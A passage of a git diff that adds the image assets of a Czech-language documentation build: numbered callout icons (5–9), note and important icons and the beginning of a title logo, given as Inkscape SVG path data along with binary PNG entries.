+       d="m 16.035597,14.255508 c 0.520177,8e-6 1.004388,0.08025 1.452637,0.240723 0.448235,0.160489 0.838371,0.395678 1.17041,0.705566 0.332023,0.309903 0.592114,0.697272 0.780273,1.16211 0.188143,0.459315 0.282218,0.987797 0.282227,1.585449 -9e-6,0.658532 -0.102385,1.250654 -0.307129,1.776367 -0.204761,0.520184 -0.506356,0.962892 -0.904785,1.328125 -0.398445,0.359701 -0.893724,0.636394 -1.48584,0.830078 -0.586594,0.193685 -1.261724,0.290528 -2.025391,0.290528 -0.304365,0 -0.60596,-0.01384 -0.904785,-0.0415 -0.298831,-0.02767 -0.586591,-0.06917 -0.863281,-0.124512 -0.271161,-0.04981 -0.531252,-0.116211 -0.780274,-0.199219 -0.24349,-0.08301 -0.464844,-0.17985 -0.664062,-0.290527 l 0,-2.216309 c 0.193684,0.11068 0.417805,0.215823 0.672363,0.31543 0.254556,0.09408 0.517414,0.177086 0.788574,0.249024 0.276691,0.06641 0.553383,0.121746 0.830078,0.166015 0.27669,0.03874 0.539548,0.05811 0.788575,0.05811 0.741532,2e-6 1.305984,-0.152179 1.693359,-0.456543 0.387364,-0.309893 0.581049,-0.799639 0.581055,-1.469239 -6e-6,-0.597651 -0.190924,-1.051427 -0.572754,-1.361328 -0.376307,-0.315424 -0.960128,-0.473139 -1.751465,-0.473144 -0.143884,5e-6 -0.298832,0.0083 -0.464844,0.0249 -0.160485,0.01661 -0.320966,0.03874 -0.481445,0.06641 -0.154951,0.02768 -0.304365,0.05811 -0.448242,0.09131 -0.143883,0.02767 -0.268394,0.05811 -0.373535,0.09131 l -1.020996,-0.547852 0.456542,-6.1840821 6.408204,0 0,2.1748051 -4.183594,0 -0.199219,2.382324 c 0.17708,-0.03873 0.381832,-0.07747 0.614258,-0.116211 0.237951,-0.03873 0.542313,-0.0581 0.913086,-0.05811"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/6.png b/tmp/cs-CZ/xml/Common_Content/images/6.png
new file mode 100644
index 000000000..22fc272c0
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/6.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/6.svg b/tmp/cs-CZ/xml/Common_Content/images/6.svg
new file mode 100644
index 000000000..b80629368
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/6.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 11.702589,16.853653 c -10e-7,-0.581049 0.03044,-1.159336 0.09131,-1.734863 0.0664,-0.575514 0.179849,-1.126132 0.340332,-1.651856 0.166014,-0.531241 0.387368,-1.023753 0.664062,-1.477539 0.282225,-0.453765 0.636391,-0.846669 1.0625,-1.178711 0.431638,-0.337553 0.946285,-0.600411 1.543945,-0.788574 0.603186,-0.1936727 1.305984,-0.2905151 2.108399,-0.2905274 0.116204,1.23e-5 0.243483,0.00278 0.381836,0.0083 0.138339,0.00555 0.276685,0.013847 0.415039,0.024902 0.143873,0.00555 0.282219,0.016614 0.415039,0.033203 0.132805,0.016614 0.251782,0.035982 0.356934,0.058105 l 0,2.0502924 c -0.210295,-0.04979 -0.434416,-0.08853 -0.672364,-0.116211 -0.232429,-0.03319 -0.467617,-0.04979 -0.705566,-0.0498 -0.747076,1e-5 -1.361334,0.09408 -1.842774,0.282226 -0.481449,0.182627 -0.863285,0.439951 -1.145507,0.771973 -0.28223,0.33204 -0.484216,0.730477 -0.605957,1.195312 -0.116214,0.464852 -0.188154,0.9795 -0.215821,1.543946 l 0.09961,0 c 0.110674,-0.199212 0.243486,-0.384596 0.398437,-0.556153 0.160478,-0.177076 0.345862,-0.32649 0.556153,-0.448242 0.210282,-0.127271 0.44547,-0.22688 0.705566,-0.298828 0.26562,-0.07193 0.561681,-0.107902 0.888184,-0.10791 0.52571,8e-6 0.998854,0.08578 1.419433,0.257324 0.420566,0.171557 0.774732,0.42058 1.0625,0.74707 0.293286,0.326504 0.517407,0.727708 0.672363,1.203614 0.15494,0.475916 0.232413,1.021 0.232422,1.635254 -9e-6,0.658532 -0.09408,1.247887 -0.282226,1.768066 -0.182626,0.520184 -0.445484,0.962892 -0.788575,1.328125 -0.343106,0.359701 -0.758145,0.636394 -1.245117,0.830078 -0.486985,0.188151 -1.034836,0.282227 -1.643554,0.282227 -0.597661,0 -1.15658,-0.105144 -1.676758,-0.31543 -0.520185,-0.21582 -0.973961,-0.542317 -1.361328,-0.979492 -0.381838,-0.437173 -0.683433,-0.987791 -0.904785,-1.651856 -0.215822,-0.669593 -0.323732,-1.460933 -0.323731,-2.374023 m 4.216797,3.270508 c 0.226883,2e-6 0.431635,-0.0415 0.614258,-0.124512 0.188145,-0.08854 0.348627,-0.218585 0.481445,-0.390137 0.13834,-0.17708 0.243483,-0.398434 0.31543,-0.664062 0.07747,-0.265622 0.116204,-0.581051 0.116211,-0.946289 -7e-6,-0.592118 -0.124518,-1.056961 -0.373535,-1.394531 -0.243496,-0.343094 -0.617031,-0.514643 -1.120606,-0.514649 -0.254562,6e-6 -0.486984,0.04981 -0.697266,0.149414 -0.21029,0.09962 -0.39014,0.229661 -0.53955,0.390137 -0.149418,0.160487 -0.265629,0.340337 -0.348633,0.539551 -0.07748,0.199223 -0.116214,0.401209 -0.116211,0.605957 -3e-6,0.28223 0.0332,0.564456 0.09961,0.846679 0.07194,0.276696 0.17708,0.528486 0.31543,0.755371 0.143876,0.221357 0.318193,0.401207 0.522949,0.539551 0.210282,0.138349 0.453772,0.207522 0.730469,0.20752"
+       id="path2846"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/7.png b/tmp/cs-CZ/xml/Common_Content/images/7.png
new file mode 100644
index 000000000..9b1f20a98
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/7.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/7.svg b/tmp/cs-CZ/xml/Common_Content/images/7.svg
new file mode 100644
index 000000000..871e0eff7
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/7.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 12.789991,22.008438 4.316407,-9.960937 -5.578125,0 0,-2.1582035 8.367187,0 0,1.6103515 -4.424316,10.508789 -2.681153,0"
+       id="path2832"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/8.png b/tmp/cs-CZ/xml/Common_Content/images/8.png
new file mode 100644
index 000000000..ac38ae5bf
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/8.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/8.svg b/tmp/cs-CZ/xml/Common_Content/images/8.svg
new file mode 100644
index 000000000..10e612f6e
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/8.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.761671,9.7149811 c 0.503576,1.23e-5 0.979487,0.060885 1.427734,0.1826172 0.448236,0.1217567 0.841139,0.3043737 1.178711,0.5478517 0.337558,0.243501 0.60595,0.547862 0.805176,0.913086 0.199211,0.365244 0.29882,0.794118 0.298828,1.286621 -8e-6,0.365243 -0.05535,0.697274 -0.166015,0.996094 -0.110686,0.293302 -0.262866,0.561694 -0.456543,0.805175 -0.193693,0.237963 -0.423348,0.451017 -0.688965,0.639161 -0.265632,0.188157 -0.553392,0.359707 -0.863281,0.514648 0.320957,0.171556 0.633619,0.362473 0.937988,0.572754 0.309888,0.210292 0.583814,0.448247 0.821777,0.713867 0.237948,0.260096 0.428866,0.55339 0.572754,0.879883 0.143872,0.326501 0.215812,0.691735 0.21582,1.095703 -8e-6,0.503583 -0.09962,0.960126 -0.298828,1.369629 -0.199227,0.409506 -0.478686,0.758139 -0.838379,1.045898 -0.359707,0.287761 -0.791348,0.509115 -1.294921,0.664063 -0.498053,0.154948 -1.048671,0.232422 -1.651856,0.232422 -0.652999,0 -1.234053,-0.07471 -1.743164,-0.224121 -0.509117,-0.149414 -0.93799,-0.362467 -1.286621,-0.639161 -0.348634,-0.276691 -0.614259,-0.617023 -0.796875,-1.020996 -0.177084,-0.403969 -0.265626,-0.857744 -0.265625,-1.361328 -10e-7,-0.415035 0.06087,-0.78857 0.182617,-1.120605 0.121744,-0.332027 0.287759,-0.630855 0.498047,-0.896485 0.210285,-0.265619 0.456541,-0.500808 0.73877,-0.705566 0.282224,-0.204747 0.583819,-0.384597 0.904785,-0.539551 -0.271162,-0.171543 -0.525719,-0.356927 -0.763672,-0.556152 -0.237958,-0.204746 -0.445477,-0.428866 -0.622559,-0.672363 -0.171551,-0.249016 -0.309897,-0.522942 -0.415039,-0.821778 -0.09961,-0.298819 -0.149415,-0.628083 -0.149414,-0.987793 -10e-7,-0.481435 0.09961,-0.902008 0.298828,-1.261718 0.204751,-0.365224 0.478677,-0.669585 0.821778,-0.913086 0.343096,-0.249012 0.738766,-0.434396 1.187011,-0.5561527 0.448239,-0.1217326 0.918616,-0.1826049 1.411133,-0.1826172 m -1.718262,9.0644529 c -3e-6,0.221357 0.03597,0.42611 0.107911,0.614258 0.07194,0.18262 0.17708,0.340334 0.315429,0.473145 0.143877,0.132814 0.32096,0.237957 0.53125,0.315429 0.210283,0.07194 0.453772,0.107912 0.730469,0.10791 0.581049,2e-6 1.015457,-0.135577 1.303223,-0.406738 0.287754,-0.27669 0.431634,-0.639157 0.43164,-1.087402 -6e-6,-0.232419 -0.04981,-0.439938 -0.149414,-0.622559 -0.09408,-0.188147 -0.218593,-0.359696 -0.373535,-0.514648 -0.14942,-0.160478 -0.320969,-0.307125 -0.514648,-0.439942 -0.19369,-0.132807 -0.387375,-0.260086 -0.581055,-0.381836 L 15.662062,16.72084 c -0.243494,0.12175 -0.464848,0.254563 -0.664063,0.398438 -0.199222,0.138351 -0.370772,0.293299 -0.514648,0.464844 -0.13835,0.16602 -0.24626,0.348637 -0.323731,0.547851 -0.07748,0.199223 -0.116214,0.415043 -0.116211,0.647461 m 1.701661,-7.188476 c -0.182622,10e-6 -0.354171,0.02768 -0.514649,0.08301 -0.154952,0.05535 -0.290531,0.13559 -0.406738,0.240723 -0.110681,0.105153 -0.199223,0.235199 -0.265625,0.390137 -0.06641,0.154957 -0.09961,0.329274 -0.09961,0.522949 -3e-6,0.232431 0.0332,0.434416 0.09961,0.605957 0.07194,0.166024 0.166012,0.315438 0.282226,0.448242 0.121741,0.127287 0.260087,0.243498 0.415039,0.348633 0.160478,0.09962 0.32926,0.199226 0.506348,0.298828 0.171545,-0.08853 0.334793,-0.185376 0.489746,-0.290527 0.154943,-0.105135 0.290522,-0.224113 0.406738,-0.356934 0.12174,-0.138338 0.218582,-0.293286 0.290528,-0.464843 0.07193,-0.171541 0.107904,-0.367993 0.10791,-0.589356 -6e-6,-0.193675 -0.03321,-0.367992 -0.09961,-0.522949 -0.06641,-0.154938 -0.157721,-0.284984 -0.273926,-0.390137 -0.116217,-0.105133 -0.254563,-0.185374 -0.415039,-0.240723 -0.160487,-0.05533 -0.334803,-0.083 -0.522949,-0.08301"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/9.png b/tmp/cs-CZ/xml/Common_Content/images/9.png
new file mode 100644
index 000000000..a2972dbc2
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/9.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/9.svg b/tmp/cs-CZ/xml/Common_Content/images/9.svg
new file mode 100644
index 000000000..c488b6e4f
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/9.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 19.829054,15.052383 c -9e-6,0.581061 -0.03321,1.162116 -0.09961,1.743164 -0.06088,0.575526 -0.174325,1.126144 -0.340333,1.651856 -0.160489,0.525719 -0.381843,1.018232 -0.664062,1.477539 -0.2767,0.453778 -0.630866,0.846681 -1.0625,1.178711 -0.426113,0.332032 -0.940761,0.59489 -1.543945,0.788574 -0.597661,0.188151 -1.30046,0.282227 -2.108399,0.282227 -0.116214,0 -0.243492,-0.0028 -0.381836,-0.0083 -0.138348,-0.0055 -0.279462,-0.01384 -0.42334,-0.0249 -0.138348,-0.0055 -0.273927,-0.0166 -0.406738,-0.0332 -0.132814,-0.01107 -0.249025,-0.02767 -0.348633,-0.0498 l 0,-2.058594 c 0.204751,0.05534 0.423338,0.09961 0.655762,0.132813 0.237954,0.02767 0.478676,0.04151 0.722168,0.0415 0.747067,2e-6 1.361324,-0.09131 1.842773,-0.273925 0.481441,-0.188149 0.863276,-0.44824 1.145508,-0.780274 0.282221,-0.337562 0.481439,-0.738766 0.597657,-1.203613 0.121738,-0.464839 0.196445,-0.97672 0.224121,-1.535645 l -0.107911,0 c -0.110683,0.199225 -0.243495,0.384609 -0.398437,0.556153 -0.154954,0.171554 -0.337571,0.320968 -0.547852,0.448242 -0.210291,0.127283 -0.448247,0.226892 -0.713867,0.298828 -0.265629,0.07194 -0.56169,0.107914 -0.888183,0.10791 -0.52572,4e-6 -0.998864,-0.08577 -1.419434,-0.257324 -0.420575,-0.171545 -0.777508,-0.420568 -1.070801,-0.74707 -0.287761,-0.326492 -0.509115,-0.727696 -0.664062,-1.203614 -0.154949,-0.475904 -0.232423,-1.020988 -0.232422,-1.635253 -10e-7,-0.65852 0.09131,-1.247875 0.273926,-1.768067 0.18815,-0.520172 0.453774,-0.960113 0.796875,-1.319824 0.343097,-0.365223 0.758135,-0.644682 1.245117,-0.838379 0.49251,-0.1936727 1.043127,-0.2905151 1.651855,-0.2905274 0.597651,1.23e-5 1.15657,0.1079224 1.676758,0.3237304 0.520176,0.210298 0.971184,0.534028 1.353027,0.971192 0.381829,0.437185 0.683423,0.990569 0.904786,1.660156 0.221345,0.669605 0.332022,1.458178 0.332031,2.365722 m -4.216797,-3.262207 c -0.226892,1.1e-5 -0.434412,0.04151 -0.622559,0.124512 -0.188154,0.08302 -0.351403,0.213063 -0.489746,0.390137 -0.132815,0.171559 -0.237959,0.392913 -0.315429,0.664062 -0.07194,0.265634 -0.107914,0.581063 -0.107911,0.946289 -3e-6,0.586596 0.124509,1.05144 0.373536,1.394532 0.249019,0.343105 0.625321,0.514654 1.128906,0.514648 0.254552,6e-6 0.486974,-0.0498 0.697266,-0.149414 0.210281,-0.0996 0.390131,-0.229648 0.53955,-0.390137 0.149408,-0.160475 0.262852,-0.340325 0.340332,-0.53955 0.083,-0.199212 0.124506,-0.401197 0.124512,-0.605958 -6e-6,-0.282218 -0.03598,-0.561677 -0.10791,-0.838378 -0.06641,-0.282218 -0.171556,-0.534008 -0.31543,-0.755372 -0.138352,-0.226878 -0.312668,-0.409495 -0.522949,-0.547851 -0.204758,-0.138336 -0.44548,-0.207509 -0.722168,-0.20752"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/dot.png b/tmp/cs-CZ/xml/Common_Content/images/dot.png
new file mode 100644
index 000000000..077ecd4b5
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/dot.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/dot2.png b/tmp/cs-CZ/xml/Common_Content/images/dot2.png
new file mode 100644
index 000000000..8348fcd05
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/dot2.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/green.png b/tmp/cs-CZ/xml/Common_Content/images/green.png
new file mode 100644
index 000000000..ebb3c247d
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/green.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/h1-bg.png b/tmp/cs-CZ/xml/Common_Content/images/h1-bg.png
new file mode 100644
index 000000000..d67e9b9e8
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/h1-bg.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/image_left.png b/tmp/cs-CZ/xml/Common_Content/images/image_left.png
new file mode 100644
index 000000000..4f742e0e1
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/image_left.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/image_right.png b/tmp/cs-CZ/xml/Common_Content/images/image_right.png
new file mode 100644
index 000000000..63d7ac214
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/image_right.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/important.png b/tmp/cs-CZ/xml/Common_Content/images/important.png
new file mode 100644
index 000000000..969562b7b
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/important.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/important.svg b/tmp/cs-CZ/xml/Common_Content/images/important.svg
new file mode 100644
index 000000000..064c783b5
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/important.svg
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="48"
+   height="48"
+   id="svg2">
+  <defs
+     id="defs5" />
+  <path
+     d="M 255.25,-411.29002 L 261.86798,-400.85887 L 273.83367,-397.7882 L 265.95811,-388.27072 L 266.73534,-375.94179 L 255.25,-380.49082 L 243.76466,-375.94179 L 244.54189,-388.27072 L 236.66633,-397.7882 L 248.63202,-400.85887 L 255.25,-411.29002 z "
+     transform="matrix(1.1071323,0,0,1.1071323,-258.4137,459.98052)"
+     style="fill:#2e3436;fill-opacity:1;stroke:#2e3436;stroke-width:4.25880718;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"
+     id="path4450" />
+  <path
+     d="M 255.25,-411.29002 L 261.86798,-400.85887 L 273.83367,-397.7882 L 265.95811,-388.27072 L 266.73534,-375.94179 L 255.25,-380.49082 L 243.76466,-375.94179 L 244.54189,-388.27072 L 236.66633,-397.7882 L 248.63202,-400.85887 L 255.25,-411.29002 z "
+     transform="matrix(1.1071323,0,0,1.1071323,-258.4137,459.98052)"
+     style="fill:#fac521;fill-opacity:1;stroke-width:3.4070456;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"
+     id="path4452" />
+  <path
+     d="M 24.175987,4.476098 L 16.980534,16.087712 L 3.9317841,19.443104 L 16.980534,20.076901 L 24.175987,10.383543 L 31.408721,20.076901 L 44.457471,19.443104 L 31.468862,16.027571 L 24.175987,4.476098 z "
+     style="fill:#feeaab;fill-opacity:1;stroke-width:3.4070456;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"
+     id="path4531" />
+  <path
+     d="M 12.456856,24.055852 C 11.65845,24.299685 14.436112,29.177769 14.436112,32.041127 C 14.436112,37.343117 13.010825,39.831516 15.971742,37.364645 C 18.711008,35.08244 21.184735,34.873512 24.195894,34.873512 C 27.207053,34.873512 29.646656,35.08244 32.38592,37.364645 C 35.346837,39.831516 33.921551,37.343117 33.92155,32.041127 C 33.92155,28.223316 38.868232,20.827013 33.682674,25.591482 C 31.458295,27.635233 27.413886,29.481744 24.195894,29.481744 C 20.977903,29.481744 16.933493,27.635233 14.709113,25.591482 C 13.412724,24.400365 12.722992,23.974574 12.456856,24.055852 z "
+     style="fill:#fcd867;fill-opacity:1;stroke-width:3.4070456;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"
+     id="path2185" />
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/note.png b/tmp/cs-CZ/xml/Common_Content/images/note.png
new file mode 100644
index 000000000..d04775d99
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/note.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/note.svg b/tmp/cs-CZ/xml/Common_Content/images/note.svg
new file mode 100644
index 000000000..abe5a6024
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/note.svg
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="48"
+   height="48"
+   id="svg2">
+  <defs
+     id="defs5" />
+  <path
+     d="M 30.27396,4.1232594 L 18.765811,4.1232594 C 11.476786,4.1232594 5.5574109,10.546411 5.5574109,19.960741 C 5.5574109,24.746615 7.0844878,29.075948 9.5403943,32.177328 C 9.4616811,32.681104 9.414455,33.200619 9.414455,33.720144 C 9.414455,39.308917 13.554865,43.591015 18.891751,44.267966 C 17.506371,42.693663 16.656245,40.914707 16.656245,38.616218 C 16.656245,38.01799 16.719219,37.419752 16.82942,36.837262 C 17.459135,36.963202 18.104599,37.026176 18.750063,37.026176 L 30.258211,37.026176 C 37.547237,37.026176 43.466612,29.39081 43.466612,19.960741 C 43.466612,10.530672 37.578724,4.1232594 30.27396,4.1232594 z "
+     style="fill:#2e3436;fill-opacity:1;stroke:#2e3436;stroke-width:4.7150631;stroke-miterlimit:4;stroke-dasharray:none"
+     id="path4317" />
+  <path
+     d="M 30.27396,4.1232594 L 18.765811,4.1232594 C 11.476786,4.1232594 5.5574109,10.546411 5.5574109,19.960741 C 5.5574109,24.746615 7.0844878,29.075948 9.5403943,32.177328 C 9.4616811,32.681104 9.414455,33.200619 9.414455,33.720144 C 9.414455,39.308917 13.554865,43.591015 18.891751,44.267966 C 17.506371,42.693663 16.656245,40.914707 16.656245,38.616218 C 16.656245,38.01799 16.719219,37.419752 16.82942,36.837262 C 17.459135,36.963202 18.104599,37.026176 18.750063,37.026176 L 30.258211,37.026176 C 37.547237,37.026176 43.466612,29.39081 43.466612,19.960741 C 43.466612,10.530672 37.578724,4.1232594 30.27396,4.1232594 z "
+     style="fill:#bfdce8;fill-opacity:1"
+     id="path142" />
+  <path
+     d="M 19.200879,5.5648899 C 12.490241,5.5648899 7.0622987,11.295775 7.0622987,19.690323 C 7.0622987,22.890926 7.8418023,25.879852 9.1910836,28.332288 C 8.6113289,26.599889 8.2852163,24.667826 8.2852163,22.673336 C 8.2852163,14.629768 13.495502,9.1620492 19.925575,9.1620492 L 30.071259,9.1620492 C 36.515213,9.1620492 41.711609,14.616311 41.711609,22.673336 C 41.864688,21.709218 41.983366,20.710908 41.983366,19.690323 C 41.983366,11.281743 36.524624,5.5648899 29.799492,5.5648899 L 19.200879,5.5648899 z "
+     style="fill:#ffffff"
+     id="path2358" />
+  <path
+     d="M 28.241965,33.725087 L 20.792252,33.725087 C 16.073756,33.725087 12.241894,32.944782 12.241894,26.850486 C 12.241894,25.10387 12.368512,23.572125 15.515722,23.567487 L 33.508301,23.540969 C 36.182481,23.537028 36.782127,24.950794 36.782127,26.850486 C 36.782127,32.95497 32.970649,33.725087 28.241965,33.725087 z "
+     style="fill:#d0ecf9;fill-opacity:1"
+     id="path2173" />
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/red.png b/tmp/cs-CZ/xml/Common_Content/images/red.png
new file mode 100644
index 000000000..d32d5e2e8
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/red.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/shine.png b/tmp/cs-CZ/xml/Common_Content/images/shine.png
new file mode 100644
index 000000000..7d736bdef
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/shine.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/stock-go-back.png b/tmp/cs-CZ/xml/Common_Content/images/stock-go-back.png
new file mode 100644
index 000000000..0f26df330
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/stock-go-back.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/stock-go-forward.png b/tmp/cs-CZ/xml/Common_Content/images/stock-go-forward.png
new file mode 100644
index 000000000..4bcbf0296
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/stock-go-forward.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/stock-go-up.png b/tmp/cs-CZ/xml/Common_Content/images/stock-go-up.png
new file mode 100644
index 000000000..8bcf9e725
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/stock-go-up.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/stock-home.png b/tmp/cs-CZ/xml/Common_Content/images/stock-home.png
new file mode 100644
index 000000000..f37ef3d1b
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/stock-home.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/title_logo.png b/tmp/cs-CZ/xml/Common_Content/images/title_logo.png
new file mode 100644
index 000000000..75fd5035c
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/title_logo.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/title_logo.svg b/tmp/cs-CZ/xml/Common_Content/images/title_logo.svg
new file mode 100644
index 000000000..05cc1c4cd
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/title_logo.svg
@@ -0,0 +1,350 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:dc="http://purl.org/dc/elements/1.1/"
+   xmlns:cc="http://creativecommons.org/ns#"
+   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   xmlns:xlink="http://www.w3.org/1999/xlink"
+   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
+   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
+   version="1.1"
+   width="253.10916"
+   height="195.16167"
+   id="svg2"
+   style="enable-background:new">
+  <defs
+     id="defs5">
+    <linearGradient
+       id="linearGradient6430">
+      <stop
+         id="stop6432"
+         style="stop-color:#ce0000;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop6434"
+         style="stop-color:#e90000;stop-opacity:1"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient3218">
+      <stop
+         id="stop3220"
+         style="stop-color:#000000;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop3222"
+         style="stop-color:#555753;stop-opacity:1"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient3210">
+      <stop
+         id="stop3212"
+         style="stop-color:#edd400;stop-opacity:1"
